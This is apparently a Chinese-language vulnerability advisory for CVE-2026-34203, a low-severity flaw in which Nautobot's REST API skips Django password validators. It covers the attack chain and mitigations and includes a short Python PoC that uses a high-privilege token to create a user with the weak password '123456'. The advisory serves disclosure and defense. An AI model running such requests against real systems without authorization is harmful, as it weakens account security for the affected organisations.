CVE-2026-34203 CVSS 2.7 低危

CVE-2026-34203 Nautobot REST API密码验证绕过漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34203

漏洞类型

验证绕过

CVSS评分

2.7 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Nautobot

漏洞概述

Nautobot是一个网络事实来源和网络自动化平台。在2.4.30和3.0.10版本之前，其REST API在处理用户创建和编辑请求时存在逻辑缺陷，未能应用Django配置中定义的密码验证规则。该漏洞允许拥有高权限的攻击者通过接口设置弱密码，从而绕过安全策略，极大地增加了账户遭受暴力破解或凭据填充攻击的风险。

技术细节

该漏洞源于Nautobot在处理REST API请求时未正确调用Django的AUTH_PASSWORD_VALIDATORS验证机制。尽管管理员可以在nautobot_config.py中设置严格的密码策略（如最小长度、必须包含数字或特殊字符），但在2.4.30和3.0.10之前的版本中，API层面的序列化器或视图逻辑未强制执行这些检查。攻击者需具备高权限账户（PR:H）才能利用此漏洞。利用方式主要是通过发送特制的HTTP POST（创建用户）或PATCH（修改用户）请求到/api/users/等相关端点，在JSON payload中传入不符合策略的弱密码（例如'password'或'123456'）。由于服务端后端验证逻辑缺失，服务器接受了该请求并将弱密码写入数据库。这不仅违反了企业的安全合规要求，还导致目标账户极易遭受暴力破解攻击，严重破坏了系统的完整性。

攻击链分析

STEP 1

攻击者获取Nautobot系统的高权限API令牌或Web会话凭证。

STEP 2

攻击者构造恶意HTTP请求，向REST API用户端点发送包含弱密码的用户创建或修改数据。

STEP 3

Nautobot服务器接收请求，由于未调用验证器，直接将弱密码写入数据库。

STEP 4

成功创建或修改了使用弱密码的账户，降低了账户安全性，便于后续攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests # Target URL for user creation url = "https://<nautobot-host>/api/users/" # Headers with authentication (High privilege token required) headers = { "Authorization": "Token <HIGH_PRIVILEGE_API_TOKEN>", "Content-Type": "application/json", "Accept": "application/json" } # Payload containing a weak password that bypasses validation payload = { "username": "testuser", "password": "123456", "email": "[email protected]" } # Send POST request to create user response = requests.post(url, json=payload, headers=headers, verify=False) if response.status_code == 201: print("[+] Success: User created with weak password.") print(f"[+] Response: {response.json()}") else: print(f"[-] Failed: {response.status_code}") print(response.text)

影响范围

Nautobot < 2.4.30

Nautobot >= 3.0.0, < 3.0.10

防御指南

临时缓解措施

如果无法立即升级，建议管理员严格限制REST API的访问权限，仅允许受信任的IP或服务账户访问。同时，应定期审计系统用户列表，检查是否存在弱密码账户，并通过其他手段强制修改。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表